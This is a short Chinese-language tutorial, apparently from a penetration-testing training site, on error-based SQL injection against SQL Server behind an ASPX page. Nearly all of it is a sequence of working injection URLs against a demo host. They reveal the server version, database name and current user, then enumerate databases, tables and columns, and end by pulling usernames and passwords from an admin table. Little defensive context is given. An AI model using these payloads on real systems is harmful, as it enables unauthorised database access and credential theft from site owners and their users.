[原创]WEB安全第四章SQL注入篇11 sqlserver 报错注入
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
WEB安全第四章SQL注入篇11 sqlserver 报错注入
sqlserver在语句执行错误的时候 会报错 并且会在网页上显示出来。
环境 sql2008+aspx
1.显示系统信息
and @@version>0 利用mssql在转换类型的时候就出错时 会显示系统信息。
http://www.demo1.com/index.aspx?id=1 and @@version>0
![[原创]WEB安全第四章SQL注入篇11 sqlserver 报错注入](https://www.moonsec.com/wp-content/uploads/2019/11/image001-4.png)
![[原创]WEB安全第四章SQL注入篇11 sqlserver 报错注入](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
2.爆出数据库
http://www.demo1.com/index.aspx?id=-1 and db_name()>0
3.当前用户 dbo
http://www.demo1.com/index.aspx?id=-1 and User_Name()>0
4.爆出其他数据库
http://www.demo1.com/index.aspx?id=-1 and (SELECT top 1 Name FROM Master..SysDatabases)>0
http://www.demo1.com/index.aspx?id=-1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in (‘master’))>0
http://www.demo1.com/index.aspx?id=-1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in (‘master’,’iNethinkCMS’,’model’,’msdb’))>0
5.爆表
http://www.demo1.com/index.aspx?id=-1 and (select top 1 name from [mydb].sys.all_objects where type=’U’ AND is_ms_shipped=0)>0
http://www.demo1.com/index.aspx?id=-1 and (select top 1 name from mydb.sys.all_objects where type=’U’ AND is_ms_shipped=0 and name not in (‘admin’))>0
6.爆出列
http://www.demo1.com/index.aspx?id=1 and (select top 1 COLUMN_NAME from mydb.information_schema.columns where TABLE_NAME=’admin’ and COLUMN_NAME not in(‘ID’))>0
http://www.demo1.com/index.aspx?id=1 and (select top 1 COLUMN_NAME from mydb.information_schema.columns where TABLE_NAME=’admin’ and COLUMN_NAME not in(‘ID’,’username’))>0
7.爆出数据
http://www.demo1.com/index.aspx?id=1 and (select top 1 password from admin)>0
http://www.demo1.com/index.aspx?id=1 and (select top 1 username from admin)>0
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/143.html
mOon 